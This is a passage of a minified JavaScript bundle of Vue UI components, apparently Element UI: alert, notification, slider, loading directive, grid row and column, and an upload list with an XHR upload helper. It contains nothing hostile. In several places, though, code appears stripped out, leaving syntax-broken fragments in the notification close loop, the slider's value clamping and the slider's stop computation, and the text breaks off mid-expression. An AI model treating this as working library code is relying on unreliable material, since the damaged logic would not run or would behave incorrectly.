i("transition",{attrs:{name:"el-alert-fade"}},[i("div",{directives:[{name:"show",rawName:"v-show",value:e.visible,expression:"visible"}],staticClass:"el-alert",class:[e.typeClass,e.center?"is-center":"","is-"+e.effect],attrs:{role:"alert"}},[e.showIcon?i("i",{staticClass:"el-alert__icon",class:[e.iconClass,e.isBigIcon]}):e._e(),i("div",{staticClass:"el-alert__content"},[e.title||e.$slots.title?i("span",{staticClass:"el-alert__title",class:[e.isBoldTitle]},[e._t("title",[e._v(e._s(e.title))])],2):e._e(),e.$slots.default&&!e.description?i("p",{staticClass:"el-alert__description"},[e._t("default")],2):e._e(),e.description&&!e.$slots.default?i("p",{staticClass:"el-alert__description"},[e._v(e._s(e.description))]):e._e(),i("i",{directives:[{name:"show",rawName:"v-show",value:e.closable,expression:"closable"}],staticClass:"el-alert__closebtn",class:{"is-customed":""!==e.closeText,"el-icon-close":""===e.closeText},on:{click:function(t){e.close()}}},[e._v(e._s(e.closeText))])])])])},Mc=[];Pc._withStripped=!0;var Nc={success:"el-icon-success",warning:"el-icon-warning",error:"el-icon-error"},Ic={name:"ElAlert",props:{title:{type:String,default:""},description:{type:String,default:""},type:{type:String,default:"info"},closable:{type:Boolean,default:!0},closeText:{type:String,default:""},showIcon:Boolean,center:Boolean,effect:{type:String,default:"light",validator:function(e){return-1!==["light","dark"].indexOf(e)}}},data:function(){return{visible:!0}},methods:{close:function(){this.visible=!1,this.$emit("close")}},computed:{typeClass:function(){return"el-alert--"+this.type},iconClass:function(){return Nc[this.type]||"el-icon-info"},isBigIcon:function(){return this.description||this.$slots.default?"is-big":""},isBoldTitle:function(){return this.description||this.$slots.default?"is-bold":""}}},jc=Ic,Fc=o(jc,Pc,Mc,!1,null,null,null);Fc.options.__file="packages/alert/src/main.vue";var Lc=Fc.exports;Lc.install=function(e){e.component(Lc.name,Lc)};var Ac=Lc,Vc=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("transition",{attrs:{name:"el-notification-fade"}},[i("div",{directives:[{name:"show",rawName:"v-show",value:e.visible,expression:"visible"}],class:["el-notification",e.customClass,e.horizontalClass],style:e.positionStyle,attrs:{role:"alert"},on:{mouseenter:function(t){e.clearTimer()},mouseleave:function(t){e.startTimer()},click:e.click}},[e.type||e.iconClass?i("i",{staticClass:"el-notification__icon",class:[e.typeClass,e.iconClass]}):e._e(),i("div",{staticClass:"el-notification__group",class:{"is-with-icon":e.typeClass||e.iconClass}},[i("h2",{staticClass:"el-notification__title",domProps:{textContent:e._s(e.title)}}),i("div",{directives:[{name:"show",rawName:"v-show",value:e.message,expression:"message"}],staticClass:"el-notification__content"},[e._t("default",[e.dangerouslyUseHTMLString?i("p",{domProps:{innerHTML:e._s(e.message)}}):i("p",[e._v(e._s(e.message))])])],2),e.showClose?i("div",{staticClass:"el-notification__closeBtn el-icon-close",on:{click:function(t){return t.stopPropagation(),e.close(t)}}}):e._e()])])])},Bc=[];Vc._withStripped=!0;var zc={success:"success",info:"info",warning:"warning",error:"error"},Rc={data:function(){return{visible:!1,title:"",message:"",duration:4500,type:"",showClose:!0,customClass:"",iconClass:"",onClose:null,onClick:null,closed:!1,verticalOffset:0,timer:null,dangerouslyUseHTMLString:!1,position:"top-right"}},computed:{typeClass:function(){return this.type&&zc[this.type]?"el-icon-"+zc[this.type]:""},horizontalClass:function(){return this.position.indexOf("right")>-1?"right":"left"},verticalProperty:function(){return/^top-/.test(this.position)?"top":"bottom"},positionStyle:function(){var e;return e={},e[this.verticalProperty]=this.verticalOffset+"px",e}},watch:{closed:function(e){e&&(this.visible=!1,this.$el.addEventListener("transitionend",this.destroyElement))}},methods:{destroyElement:function(){this.$el.removeEventListener("transitionend",this.destroyElement),this.$destroy(!0),this.$el.parentNode.removeChild(this.$el)},click:function(){"function"===typeof this.onClick&&this.onClick()},close:function(){this.closed=!0,"function"===typeof this.onClose&&this.onClose()},clearTimer:function(){clearTimeout(this.timer)},startTimer:function(){var e=this;this.duration>0&&(this.timer=setTimeout((function(){e.closed||e.close()}),this.duration))},keydown:function(e){46===e.keyCode||8===e.keyCode?this.clearTimer():27===e.keyCode?this.closed||this.close():this.startTimer()}},mounted:function(){var e=this;this.duration>0&&(this.timer=setTimeout((function(){e.closed||e.close()}),this.duration)),document.addEventListener("keydown",this.keydown)},beforeDestroy:function(){document.removeEventListener("keydown",this.keydown)}},Hc=Rc,Wc=o(Hc,Vc,Bc,!1,null,null,null);Wc.options.__file="packages/notification/src/main.vue";var qc=Wc.exports,Yc=Rn.a.extend(qc),Kc=void 0,Uc=[],Gc=1,Xc=function e(t){if(!Rn.a.prototype.$isServer){t=St()({},t);var i=t.onClose,n="notification_"+Gc++,s=t.position||"top-right";t.onClose=function(){e.close(n,i)},Kc=new Yc({data:t}),Object(Do["isVNode"])(t.message)&&(Kc.$slots.default=[t.message],t.message="REPLACED_BY_VNODE"),Kc.id=n,Kc.$mount(),document.body.appendChild(Kc.$el),Kc.visible=!0,Kc.dom=Kc.$el,Kc.dom.style.zIndex=w["PopupManager"].nextZIndex();var r=t.offset||0;return Uc.filter((function(e){return e.position===s})).forEach((function(e){r+=e.$el.offsetHeight+16})),r+=16,Kc.verticalOffset=r,Uc.push(Kc),Kc}};["success","warning","info","error"].forEach((function(e){Xc[e]=function(t){return("string"===typeof t||Object(Do["isVNode"])(t))&&(t={message:t}),t.type=e,Xc(t)}})),Xc.close=function(e,t){var i=-1,n=Uc.length,s=Uc.filter((function(t,n){return t.id===e&&(i=n,!0)}))[0];if(s&&("function"===typeof t&&t(s),Uc.splice(i,1),!(n<=1)))for(var r=s.position,a=s.dom.offsetHeight,o=i;o=0;e--)Uc[e].close()};var Zc=Xc,Qc=Zc,Jc=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("div",{staticClass:"el-slider",class:{"is-vertical":e.vertical,"el-slider--with-input":e.showInput},attrs:{role:"slider","aria-valuemin":e.min,"aria-valuemax":e.max,"aria-orientation":e.vertical?"vertical":"horizontal","aria-disabled":e.sliderDisabled}},[e.showInput&&!e.range?i("el-input-number",{ref:"input",staticClass:"el-slider__input",attrs:{step:e.step,disabled:e.sliderDisabled,controls:e.showInputControls,min:e.min,max:e.max,debounce:e.debounce,size:e.inputSize},on:{change:e.emitChange},model:{value:e.firstValue,callback:function(t){e.firstValue=t},expression:"firstValue"}}):e._e(),i("div",{ref:"slider",staticClass:"el-slider__runway",class:{"show-input":e.showInput,disabled:e.sliderDisabled},style:e.runwayStyle,on:{click:e.onSliderClick}},[i("div",{staticClass:"el-slider__bar",style:e.barStyle}),i("slider-button",{ref:"button1",attrs:{vertical:e.vertical,"tooltip-class":e.tooltipClass},model:{value:e.firstValue,callback:function(t){e.firstValue=t},expression:"firstValue"}}),e.range?i("slider-button",{ref:"button2",attrs:{vertical:e.vertical,"tooltip-class":e.tooltipClass},model:{value:e.secondValue,callback:function(t){e.secondValue=t},expression:"secondValue"}}):e._e(),e._l(e.stops,(function(t,n){return e.showStops?i("div",{key:n,staticClass:"el-slider__stop",style:e.getStopStyle(t)}):e._e()})),e.markList.length>0?[i("div",e._l(e.markList,(function(t,n){return i("div",{key:n,staticClass:"el-slider__stop el-slider__marks-stop",style:e.getStopStyle(t.position)})})),0),i("div",{staticClass:"el-slider__marks"},e._l(e.markList,(function(t,n){return i("slider-marker",{key:n,style:e.getStopStyle(t.position),attrs:{mark:t.mark}})})),1)]:e._e()],2)],1)},eu=[];Jc._withStripped=!0;var tu=i(41),iu=i.n(tu),nu=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("div",{ref:"button",staticClass:"el-slider__button-wrapper",class:{hover:e.hovering,dragging:e.dragging},style:e.wrapperStyle,attrs:{tabindex:"0"},on:{mouseenter:e.handleMouseEnter,mouseleave:e.handleMouseLeave,mousedown:e.onButtonDown,touchstart:e.onButtonDown,focus:e.handleMouseEnter,blur:e.handleMouseLeave,keydown:[function(t){return!("button"in t)&&e._k(t.keyCode,"left",37,t.key,["Left","ArrowLeft"])||"button"in t&&0!==t.button?null:e.onLeftKeyDown(t)},function(t){return!("button"in t)&&e._k(t.keyCode,"right",39,t.key,["Right","ArrowRight"])||"button"in t&&2!==t.button?null:e.onRightKeyDown(t)},function(t){return!("button"in t)&&e._k(t.keyCode,"down",40,t.key,["Down","ArrowDown"])?null:(t.preventDefault(),e.onLeftKeyDown(t))},function(t){return!("button"in t)&&e._k(t.keyCode,"up",38,t.key,["Up","ArrowUp"])?null:(t.preventDefault(),e.onRightKeyDown(t))}]}},[i("el-tooltip",{ref:"tooltip",attrs:{placement:"top","popper-class":e.tooltipClass,disabled:!e.showTooltip}},[i("span",{attrs:{slot:"content"},slot:"content"},[e._v(e._s(e.formatValue))]),i("div",{staticClass:"el-slider__button",class:{hover:e.hovering,dragging:e.dragging}})])],1)},su=[];nu._withStripped=!0;var ru={name:"ElSliderButton",components:{ElTooltip:st.a},props:{value:{type:Number,default:0},vertical:{type:Boolean,default:!1},tooltipClass:String},data:function(){return{hovering:!1,dragging:!1,isClick:!1,startX:0,currentX:0,startY:0,currentY:0,startPosition:0,newPosition:null,oldValue:this.value}},computed:{disabled:function(){return this.$parent.sliderDisabled},max:function(){return this.$parent.max},min:function(){return this.$parent.min},step:function(){return this.$parent.step},showTooltip:function(){return this.$parent.showTooltip},precision:function(){return this.$parent.precision},currentPosition:function(){return(this.value-this.min)/(this.max-this.min)*100+"%"},enableFormat:function(){return this.$parent.formatTooltip instanceof Function},formatValue:function(){return this.enableFormat&&this.$parent.formatTooltip(this.value)||this.value},wrapperStyle:function(){return this.vertical?{bottom:this.currentPosition}:{left:this.currentPosition}}},watch:{dragging:function(e){this.$parent.dragging=e}},methods:{displayTooltip:function(){this.$refs.tooltip&&(this.$refs.tooltip.showPopper=!0)},hideTooltip:function(){this.$refs.tooltip&&(this.$refs.tooltip.showPopper=!1)},handleMouseEnter:function(){this.hovering=!0,this.displayTooltip()},handleMouseLeave:function(){this.hovering=!1,this.hideTooltip()},onButtonDown:function(e){this.disabled||(e.preventDefault(),this.onDragStart(e),window.addEventListener("mousemove",this.onDragging),window.addEventListener("touchmove",this.onDragging),window.addEventListener("mouseup",this.onDragEnd),window.addEventListener("touchend",this.onDragEnd),window.addEventListener("contextmenu",this.onDragEnd))},onLeftKeyDown:function(){this.disabled||(this.newPosition=parseFloat(this.currentPosition)-this.step/(this.max-this.min)*100,this.setPosition(this.newPosition),this.$parent.emitChange())},onRightKeyDown:function(){this.disabled||(this.newPosition=parseFloat(this.currentPosition)+this.step/(this.max-this.min)*100,this.setPosition(this.newPosition),this.$parent.emitChange())},onDragStart:function(e){this.dragging=!0,this.isClick=!0,"touchstart"===e.type&&(e.clientY=e.touches[0].clientY,e.clientX=e.touches[0].clientX),this.vertical?this.startY=e.clientY:this.startX=e.clientX,this.startPosition=parseFloat(this.currentPosition),this.newPosition=this.startPosition},onDragging:function(e){if(this.dragging){this.isClick=!1,this.displayTooltip(),this.$parent.resetSize();var t=0;"touchmove"===e.type&&(e.clientY=e.touches[0].clientY,e.clientX=e.touches[0].clientX),this.vertical?(this.currentY=e.clientY,t=(this.startY-this.currentY)/this.$parent.sliderSize*100):(this.currentX=e.clientX,t=(this.currentX-this.startX)/this.$parent.sliderSize*100),this.newPosition=this.startPosition+t,this.setPosition(this.newPosition)}},onDragEnd:function(){var e=this;this.dragging&&(setTimeout((function(){e.dragging=!1,e.hideTooltip(),e.isClick||(e.setPosition(e.newPosition),e.$parent.emitChange())}),0),window.removeEventListener("mousemove",this.onDragging),window.removeEventListener("touchmove",this.onDragging),window.removeEventListener("mouseup",this.onDragEnd),window.removeEventListener("touchend",this.onDragEnd),window.removeEventListener("contextmenu",this.onDragEnd))},setPosition:function(e){var t=this;if(null!==e&&!isNaN(e)){e<0?e=0:e>100&&(e=100);var i=100/((this.max-this.min)/this.step),n=Math.round(e/i),s=n*i*(this.max-this.min)*.01+this.min;s=parseFloat(s.toFixed(this.precision)),this.$emit("input",s),this.$nextTick((function(){t.displayTooltip(),t.$refs.tooltip&&t.$refs.tooltip.updatePopper()})),this.dragging||this.value===this.oldValue||(this.oldValue=this.value)}}}},au=ru,ou=o(au,nu,su,!1,null,null,null);ou.options.__file="packages/slider/src/button.vue";var lu=ou.exports,cu={name:"ElMarker",props:{mark:{type:[String,Object]}},render:function(){var e=arguments[0],t="string"===typeof this.mark?this.mark:this.mark.label;return e("div",{class:"el-slider__marks-text",style:this.mark.style||{}},[t])}},uu={name:"ElSlider",mixins:[O.a],inject:{elForm:{default:""}},props:{min:{type:Number,default:0},max:{type:Number,default:100},step:{type:Number,default:1},value:{type:[Number,Array],default:0},showInput:{type:Boolean,default:!1},showInputControls:{type:Boolean,default:!0},inputSize:{type:String,default:"small"},showStops:{type:Boolean,default:!1},showTooltip:{type:Boolean,default:!0},formatTooltip:Function,disabled:{type:Boolean,default:!1},range:{type:Boolean,default:!1},vertical:{type:Boolean,default:!1},height:{type:String},debounce:{type:Number,default:300},label:{type:String},tooltipClass:String,marks:Object},components:{ElInputNumber:iu.a,SliderButton:lu,SliderMarker:cu},data:function(){return{firstValue:null,secondValue:null,oldValue:null,dragging:!1,sliderSize:1}},watch:{value:function(e,t){this.dragging||Array.isArray(e)&&Array.isArray(t)&&e.every((function(e,i){return e===t[i]}))||this.setValues()},dragging:function(e){e||this.setValues()},firstValue:function(e){this.range?this.$emit("input",[this.minValue,this.maxValue]):this.$emit("input",e)},secondValue:function(){this.range&&this.$emit("input",[this.minValue,this.maxValue])},min:function(){this.setValues()},max:function(){this.setValues()}},methods:{valueChanged:function(){var e=this;return this.range?![this.minValue,this.maxValue].every((function(t,i){return t===e.oldValue[i]})):this.value!==this.oldValue},setValues:function(){if(this.min>this.max)console.error("[Element Error][Slider]min should not be greater than max.");else{var e=this.value;this.range&&Array.isArray(e)?e[1]this.max?this.$emit("input",[this.max,this.max]):e[0]this.max?this.$emit("input",[e[0],this.max]):(this.firstValue=e[0],this.secondValue=e[1],this.valueChanged()&&(this.dispatch("ElFormItem","el.form.change",[this.minValue,this.maxValue]),this.oldValue=e.slice())):this.range||"number"!==typeof e||isNaN(e)||(ethis.max?this.$emit("input",this.max):(this.firstValue=e,this.valueChanged()&&(this.dispatch("ElFormItem","el.form.change",e),this.oldValue=e)))}},setPosition:function(e){var t=this.min+e*(this.max-this.min)/100;if(this.range){var i=void 0;i=Math.abs(this.minValue-t)this.secondValue?"button1":"button2",this.$refs[i].setPosition(e)}else this.$refs.button1.setPosition(e)},onSliderClick:function(e){if(!this.sliderDisabled&&!this.dragging){if(this.resetSize(),this.vertical){var t=this.$refs.slider.getBoundingClientRect().bottom;this.setPosition((t-e.clientY)/this.sliderSize*100)}else{var i=this.$refs.slider.getBoundingClientRect().left;this.setPosition((e.clientX-i)/this.sliderSize*100)}this.emitChange()}},resetSize:function(){this.$refs.slider&&(this.sliderSize=this.$refs.slider["client"+(this.vertical?"Height":"Width")])},emitChange:function(){var e=this;this.$nextTick((function(){e.$emit("change",e.range?[e.minValue,e.maxValue]:e.value)}))},getStopStyle:function(e){return this.vertical?{bottom:e+"%"}:{left:e+"%"}}},computed:{stops:function(){var e=this;if(!this.showStops||this.min>this.max)return[];if(0===this.step)return[];for(var t=(this.max-this.min)/this.step,i=100*this.step/(this.max-this.min),n=[],s=1;s100*(e.maxValue-e.min)/(e.max-e.min)})):n.filter((function(t){return t>100*(e.firstValue-e.min)/(e.max-e.min)}))},markList:function(){var e=this;if(!this.marks)return[];var t=Object.keys(this.marks);return t.map(parseFloat).sort((function(e,t){return e-t})).filter((function(t){return t<=e.max&&t>=e.min})).map((function(t){return{point:t,position:100*(t-e.min)/(e.max-e.min),mark:e.marks[t]}}))},minValue:function(){return Math.min(this.firstValue,this.secondValue)},maxValue:function(){return Math.max(this.firstValue,this.secondValue)},barSize:function(){return this.range?100*(this.maxValue-this.minValue)/(this.max-this.min)+"%":100*(this.firstValue-this.min)/(this.max-this.min)+"%"},barStart:function(){return this.range?100*(this.minValue-this.min)/(this.max-this.min)+"%":"0%"},precision:function(){var e=[this.min,this.max,this.step].map((function(e){var t=(""+e).split(".")[1];return t?t.length:0}));return Math.max.apply(null,e)},runwayStyle:function(){return this.vertical?{height:this.height}:{}},barStyle:function(){return this.vertical?{height:this.barSize,bottom:this.barStart}:{width:this.barSize,left:this.barStart}},sliderDisabled:function(){return this.disabled||(this.elForm||{}).disabled}},mounted:function(){var e=void 0;this.range?(Array.isArray(this.value)?(this.firstValue=Math.max(this.min,this.value[0]),this.secondValue=Math.min(this.max,this.value[1])):(this.firstValue=this.min,this.secondValue=this.max),this.oldValue=[this.firstValue,this.secondValue],e=this.firstValue+"-"+this.secondValue):("number"!==typeof this.value||isNaN(this.value)?this.firstValue=this.min:this.firstValue=Math.min(this.max,Math.max(this.min,this.value)),this.oldValue=this.firstValue,e=this.firstValue),this.$el.setAttribute("aria-valuetext",e),this.$el.setAttribute("aria-label",this.label?this.label:"slider between "+this.min+" and "+this.max),this.resetSize(),window.addEventListener("resize",this.resetSize)},beforeDestroy:function(){window.removeEventListener("resize",this.resetSize)}},hu=uu,du=o(hu,Jc,eu,!1,null,null,null);du.options.__file="packages/slider/src/main.vue";var pu=du.exports;pu.install=function(e){e.component(pu.name,pu)};var fu=pu,mu=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("transition",{attrs:{name:"el-loading-fade"},on:{"after-leave":e.handleAfterLeave}},[i("div",{directives:[{name:"show",rawName:"v-show",value:e.visible,expression:"visible"}],staticClass:"el-loading-mask",class:[e.customClass,{"is-fullscreen":e.fullscreen}],style:{backgroundColor:e.background||""}},[i("div",{staticClass:"el-loading-spinner"},[e.spinner?i("i",{class:e.spinner}):i("svg",{staticClass:"circular",attrs:{viewBox:"25 25 50 50"}},[i("circle",{staticClass:"path",attrs:{cx:"50",cy:"50",r:"20",fill:"none"}})]),e.text?i("p",{staticClass:"el-loading-text"},[e._v(e._s(e.text))]):e._e()])])])},vu=[];mu._withStripped=!0;var gu={data:function(){return{text:null,spinner:null,background:null,fullscreen:!0,visible:!1,customClass:""}},methods:{handleAfterLeave:function(){this.$emit("after-leave")},setText:function(e){this.text=e}}},bu=gu,yu=o(bu,mu,vu,!1,null,null,null);yu.options.__file="packages/loading/src/loading.vue";var _u=yu.exports,xu=i(32),Cu=i.n(xu),wu=Rn.a.extend(_u),ku={install:function(e){if(!e.prototype.$isServer){var t=function(t,n){n.value?e.nextTick((function(){n.modifiers.fullscreen?(t.originalPosition=Object(Ae["getStyle"])(document.body,"position"),t.originalOverflow=Object(Ae["getStyle"])(document.body,"overflow"),t.maskStyle.zIndex=w["PopupManager"].nextZIndex(),Object(Ae["addClass"])(t.mask,"is-fullscreen"),i(document.body,t,n)):(Object(Ae["removeClass"])(t.mask,"is-fullscreen"),n.modifiers.body?(t.originalPosition=Object(Ae["getStyle"])(document.body,"position"),["top","left"].forEach((function(e){var i="top"===e?"scrollTop":"scrollLeft";t.maskStyle[e]=t.getBoundingClientRect()[e]+document.body[i]+document.documentElement[i]-parseInt(Object(Ae["getStyle"])(document.body,"margin-"+e),10)+"px"})),["height","width"].forEach((function(e){t.maskStyle[e]=t.getBoundingClientRect()[e]+"px"})),i(document.body,t,n)):(t.originalPosition=Object(Ae["getStyle"])(t,"position"),i(t,t,n)))})):(Cu()(t.instance,(function(e){if(t.instance.hiding){t.domVisible=!1;var i=n.modifiers.fullscreen||n.modifiers.body?document.body:t;Object(Ae["removeClass"])(i,"el-loading-parent--relative"),Object(Ae["removeClass"])(i,"el-loading-parent--hidden"),t.instance.hiding=!1}}),300,!0),t.instance.visible=!1,t.instance.hiding=!0)},i=function(t,i,n){i.domVisible||"none"===Object(Ae["getStyle"])(i,"display")||"hidden"===Object(Ae["getStyle"])(i,"visibility")?i.domVisible&&!0===i.instance.hiding&&(i.instance.visible=!0,i.instance.hiding=!1):(Object.keys(i.maskStyle).forEach((function(e){i.mask.style[e]=i.maskStyle[e]})),"absolute"!==i.originalPosition&&"fixed"!==i.originalPosition&&Object(Ae["addClass"])(t,"el-loading-parent--relative"),n.modifiers.fullscreen&&n.modifiers.lock&&Object(Ae["addClass"])(t,"el-loading-parent--hidden"),i.domVisible=!0,t.appendChild(i.mask),e.nextTick((function(){i.instance.hiding?i.instance.$emit("after-leave"):i.instance.visible=!0})),i.domInserted=!0)};e.directive("loading",{bind:function(e,i,n){var s=e.getAttribute("element-loading-text"),r=e.getAttribute("element-loading-spinner"),a=e.getAttribute("element-loading-background"),o=e.getAttribute("element-loading-custom-class"),l=n.context,c=new wu({el:document.createElement("div"),data:{text:l&&l[s]||s,spinner:l&&l[r]||r,background:l&&l[a]||a,customClass:l&&l[o]||o,fullscreen:!!i.modifiers.fullscreen}});e.instance=c,e.mask=c.$el,e.maskStyle={},i.value&&t(e,i)},update:function(e,i){e.instance.setText(e.getAttribute("element-loading-text")),i.oldValue!==i.value&&t(e,i)},unbind:function(e,i){e.domInserted&&(e.mask&&e.mask.parentNode&&e.mask.parentNode.removeChild(e.mask),t(e,{value:!1,modifiers:i.modifiers})),e.instance&&e.instance.$destroy()}})}}},Su=ku,Du=Rn.a.extend(_u),$u={text:null,fullscreen:!0,body:!1,lock:!1,customClass:""},Ou=void 0;Du.prototype.originalPosition="",Du.prototype.originalOverflow="",Du.prototype.close=function(){var e=this;this.fullscreen&&(Ou=void 0),Cu()(this,(function(t){var i=e.fullscreen||e.body?document.body:e.target;Object(Ae["removeClass"])(i,"el-loading-parent--relative"),Object(Ae["removeClass"])(i,"el-loading-parent--hidden"),e.$el&&e.$el.parentNode&&e.$el.parentNode.removeChild(e.$el),e.$destroy()}),300),this.visible=!1};var Eu=function(e,t,i){var n={};e.fullscreen?(i.originalPosition=Object(Ae["getStyle"])(document.body,"position"),i.originalOverflow=Object(Ae["getStyle"])(document.body,"overflow"),n.zIndex=w["PopupManager"].nextZIndex()):e.body?(i.originalPosition=Object(Ae["getStyle"])(document.body,"position"),["top","left"].forEach((function(t){var i="top"===t?"scrollTop":"scrollLeft";n[t]=e.target.getBoundingClientRect()[t]+document.body[i]+document.documentElement[i]+"px"})),["height","width"].forEach((function(t){n[t]=e.target.getBoundingClientRect()[t]+"px"}))):i.originalPosition=Object(Ae["getStyle"])(t,"position"),Object.keys(n).forEach((function(e){i.$el.style[e]=n[e]}))},Tu=function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{};if(!Rn.a.prototype.$isServer){if(e=St()({},$u,e),"string"===typeof e.target&&(e.target=document.querySelector(e.target)),e.target=e.target||document.body,e.target!==document.body?e.fullscreen=!1:e.body=!0,e.fullscreen&&Ou)return Ou;var t=e.body?document.body:e.target,i=new Du({el:document.createElement("div"),data:e});return Eu(e,t,i),"absolute"!==i.originalPosition&&"fixed"!==i.originalPosition&&Object(Ae["addClass"])(t,"el-loading-parent--relative"),e.fullscreen&&e.lock&&Object(Ae["addClass"])(t,"el-loading-parent--hidden"),t.appendChild(i.$el),Rn.a.nextTick((function(){i.visible=!0})),e.fullscreen&&(Ou=i),i}},Pu=Tu,Mu={install:function(e){e.use(Su),e.prototype.$loading=Pu},directive:Su,service:Pu},Nu=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("i",{class:"el-icon-"+e.name})},Iu=[];Nu._withStripped=!0;var ju={name:"ElIcon",props:{name:String}},Fu=ju,Lu=o(Fu,Nu,Iu,!1,null,null,null);Lu.options.__file="packages/icon/src/icon.vue";var Au=Lu.exports;Au.install=function(e){e.component(Au.name,Au)};var Vu=Au,Bu={name:"ElRow",componentName:"ElRow",props:{tag:{type:String,default:"div"},gutter:Number,type:String,justify:{type:String,default:"start"},align:String},computed:{style:function(){var e={};return this.gutter&&(e.marginLeft="-"+this.gutter/2+"px",e.marginRight=e.marginLeft),e}},render:function(e){return e(this.tag,{class:["el-row","start"!==this.justify?"is-justify-"+this.justify:"",this.align?"is-align-"+this.align:"",{"el-row--flex":"flex"===this.type}],style:this.style},this.$slots.default)},install:function(e){e.component(Bu.name,Bu)}},zu=Bu,Ru="function"===typeof Symbol&&"symbol"===typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"===typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},Hu={name:"ElCol",props:{span:{type:Number,default:24},tag:{type:String,default:"div"},offset:Number,pull:Number,push:Number,xs:[Number,Object],sm:[Number,Object],md:[Number,Object],lg:[Number,Object],xl:[Number,Object]},computed:{gutter:function(){var e=this.$parent;while(e&&"ElRow"!==e.$options.componentName)e=e.$parent;return e?e.gutter:0}},render:function(e){var t=this,i=[],n={};return this.gutter&&(n.paddingLeft=this.gutter/2+"px",n.paddingRight=n.paddingLeft),["span","offset","pull","push"].forEach((function(e){(t[e]||0===t[e])&&i.push("span"!==e?"el-col-"+e+"-"+t[e]:"el-col-"+t[e])})),["xs","sm","md","lg","xl"].forEach((function(e){if("number"===typeof t[e])i.push("el-col-"+e+"-"+t[e]);else if("object"===Ru(t[e])){var n=t[e];Object.keys(n).forEach((function(t){i.push("span"!==t?"el-col-"+e+"-"+t+"-"+n[t]:"el-col-"+e+"-"+n[t])}))}})),e(this.tag,{class:["el-col",i],style:n},this.$slots.default)},install:function(e){e.component(Hu.name,Hu)}},Wu=Hu,qu=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("transition-group",{class:["el-upload-list","el-upload-list--"+e.listType,{"is-disabled":e.disabled}],attrs:{tag:"ul",name:"el-list"}},e._l(e.files,(function(t){return i("li",{key:t.uid,class:["el-upload-list__item","is-"+t.status,e.focusing?"focusing":""],attrs:{tabindex:"0"},on:{keydown:function(i){if(!("button"in i)&&e._k(i.keyCode,"delete",[8,46],i.key,["Backspace","Delete","Del"]))return null;!e.disabled&&e.$emit("remove",t)},focus:function(t){e.focusing=!0},blur:function(t){e.focusing=!1},click:function(t){e.focusing=!1}}},[e._t("default",["uploading"!==t.status&&["picture-card","picture"].indexOf(e.listType)>-1?i("img",{staticClass:"el-upload-list__item-thumbnail",attrs:{src:t.url,alt:""}}):e._e(),i("a",{staticClass:"el-upload-list__item-name",on:{click:function(i){e.handleClick(t)}}},[i("i",{staticClass:"el-icon-document"}),e._v(e._s(t.name)+"\n ")]),i("label",{staticClass:"el-upload-list__item-status-label"},[i("i",{class:{"el-icon-upload-success":!0,"el-icon-circle-check":"text"===e.listType,"el-icon-check":["picture-card","picture"].indexOf(e.listType)>-1}})]),e.disabled?e._e():i("i",{staticClass:"el-icon-close",on:{click:function(i){e.$emit("remove",t)}}}),e.disabled?e._e():i("i",{staticClass:"el-icon-close-tip"},[e._v(e._s(e.t("el.upload.deleteTip")))]),"uploading"===t.status?i("el-progress",{attrs:{type:"picture-card"===e.listType?"circle":"line","stroke-width":"picture-card"===e.listType?6:2,percentage:e.parsePercentage(t.percentage)}}):e._e(),"picture-card"===e.listType?i("span",{staticClass:"el-upload-list__item-actions"},[e.handlePreview&&"picture-card"===e.listType?i("span",{staticClass:"el-upload-list__item-preview",on:{click:function(i){e.handlePreview(t)}}},[i("i",{staticClass:"el-icon-zoom-in"})]):e._e(),e.disabled?e._e():i("span",{staticClass:"el-upload-list__item-delete",on:{click:function(i){e.$emit("remove",t)}}},[i("i",{staticClass:"el-icon-delete"})])]):e._e()],{file:t})],2)})),0)},Yu=[];qu._withStripped=!0;var Ku=i(33),Uu=i.n(Ku),Gu={name:"ElUploadList",mixins:[g.a],data:function(){return{focusing:!1}},components:{ElProgress:Uu.a},props:{files:{type:Array,default:function(){return[]}},disabled:{type:Boolean,default:!1},handlePreview:Function,listType:String},methods:{parsePercentage:function(e){return parseInt(e,10)},handleClick:function(e){this.handlePreview&&this.handlePreview(e)}}},Xu=Gu,Zu=o(Xu,qu,Yu,!1,null,null,null);Zu.options.__file="packages/upload/src/upload-list.vue";var Qu=Zu.exports,Ju=i(24),eh=i.n(Ju);function th(e,t,i){var n=void 0;n=i.response?""+(i.response.error||i.response):i.responseText?""+i.responseText:"fail to post "+e+" "+i.status;var s=new Error(n);return s.status=i.status,s.method="post",s.url=e,s}function ih(e){var t=e.responseText||e.response;if(!t)return t;try{return JSON.parse(t)}catch(i){return t}}function nh(e){if("undefined"!==typeof XMLHttpRequest){var t=new XMLHttpRequest,i=e.action;t.upload&&(t.upload.onprogress=function(t){t.total>0&&(t.percent=t.loaded/t.total*100),e.onProgress(t)});var n=new FormData;e.data&&Object.keys(e.data).forEach((function(t){n.append(t,e.data[t])})),n.append(e.filename,e.file,e.file.name),t.onerror=function(t){e.onError(t)},t.onload=function(){if(t.status<200||t.status>=300)return e.onError(th(i,e,t));e.onSuccess(ih(t))},t.open("post",i,!0),e.withCredentials&&"withCredentials"in t&&(t.withCredentials=!0);var s=e.headers||{};for(var r in s)s.hasOwnProperty(r)&&null!==s[r]&&t.setRequestHeader(r,s[r]);return t.send(n),t}}var sh=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("div",{staticClass:"el-upload-dragger",class:{"is-dragover":e.dragover},on:{drop:function(t){return t.preventDefault(),e.onDrop(t)},dragover:function(t){return t.preventDefault(),e.onDragover(t)},dragleave:function(t){t.preventDefault(),e.dragover=!1}}},[e._t("default")],2)},rh=[];sh._withStripped=!0;var ah={name:"ElUploadDrag",props:{disabled:Boolean},inject:{uploader:{default:""}},data:function(){return{dragover:!1}},methods:{onDragover:function(){this.disabled||(this.dragover=!0)},onDrop:function(e){if(!this.disabled&&this.uploader){var t=this.uploader.accept;this.dragover=!1,t?this.$emit("file",[].slice.call(e.dataTransfer.files).filter((function(e){var i=e.type,n=e.name,s=n.indexOf(".")>-1?"."+n.split(".").pop():"",r=i.replace(/\/.*$/,"");return t.split(",").map((function(e){return e.trim()})).filter((function(e){return 